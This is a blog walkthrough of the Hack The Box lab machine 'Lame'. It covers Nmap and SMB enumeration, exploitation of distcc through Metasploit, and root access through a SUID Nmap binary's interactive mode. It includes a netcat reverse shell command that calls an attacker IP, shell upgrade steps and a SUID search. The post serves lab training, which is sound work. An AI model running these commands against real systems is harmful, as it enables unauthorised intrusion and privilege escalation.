CTF Walkthroughs, Hack The Box

Hack The Box – Lame Walkthrough

January 21, 2021 | by Stefano Lanaro | Leave a comment

Introduction

This was an easy Linux box that involved exploiting a remote command execution vulnerability in the distcc service to gain an initial foothold and the Nmap interactive mode to escalate privileges to root

Enumeration

The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, and using the following flags:

  • -sC to run default scripts
  • -sV to enumerate applications versions
  • -Pn to skip the host discovery phase, as some hosts will not respond to ping requests
  • -p- to scan all ports

SMB Enumeration

Using Smbclient to enumerate available shares:

The next step was to run a Nmap scan on ports 139 and 445 with all SMB enumeration scripts, to further enumerate this service.

nmap -p 139,445 -Pn –script smb-enum* 10.10.10.3

I then ran another Nmap scan to check for any known vulnerabilities within the SMB service. Nmap has a number of “smb-vuln-msxx-xxx” scripts that can be used to test the SMB service for public exploits.

No working exploits were found against this host.

Accessing the open shares using Smbclient, nothing useful was found

distcc Exploitation

Using SearcSploit to find known vulnerabilities in the distcc service – A Metasploit module was found

Starting MSCconsole, selecting the distcc_exec module, setting and running the exploit:

  • RHOST to specify the target host IP address
  • payload to specify the payload type, in this case the Linux CMD shell
  • LHOST to specify the local host IP address to connect to
  • LPORT to specify the local port to connect to

The exploit has granted a command shell.

The next step is to set up a Netcat listener, which will catch our reverse shell when it is executed by the victim host, using the following flags:

  • -l to listen for incoming connections
  • -v for verbose output
  • -n to skip the DNS lookup
  • -p to specify the port to listen on

Using Netcat to obtain a reverse shell with the target host:

nc -nv -e /bin/bash 10.10.14.14. 443

The following steps can be done to obtain an interactive shell:

  • Running “python -c ‘import pty; pty.spawn(“/bin/sh”)’” on the victim host
  • Hitting CTRL+Z to background the process and go back to our host
  • Running “stty raw -echo” on our host
  • Hitting “fg + ENTER” to go back to our reverse shell

Privilege Escalation

Checking for SUID and GUID:

find / -perm -u=s -type f 2>/dev/null; find / -perm -4000 -o- -perm -2000 -o- -perm -6000 2>/dev/null

Versions of Nmap between 2.02 and 5.21 had an interactive mode which allowed users to execute shell commands. Because the Nmap binary has SUID permissions, this could be exploited to escalate privileges to root.

Checking the Nmap version with: Nmap –version

Entering the Nmap interactive mode and using !sh to enter the sh shell

This has granted root access to the system.

Conclusion

This was quite an interesting little box, as the distcc service is used for speeding up compilation of source code so it’s not something you would expect to see open on a server.

The privilege escalation part was quite easy although it reminded me important updating software is.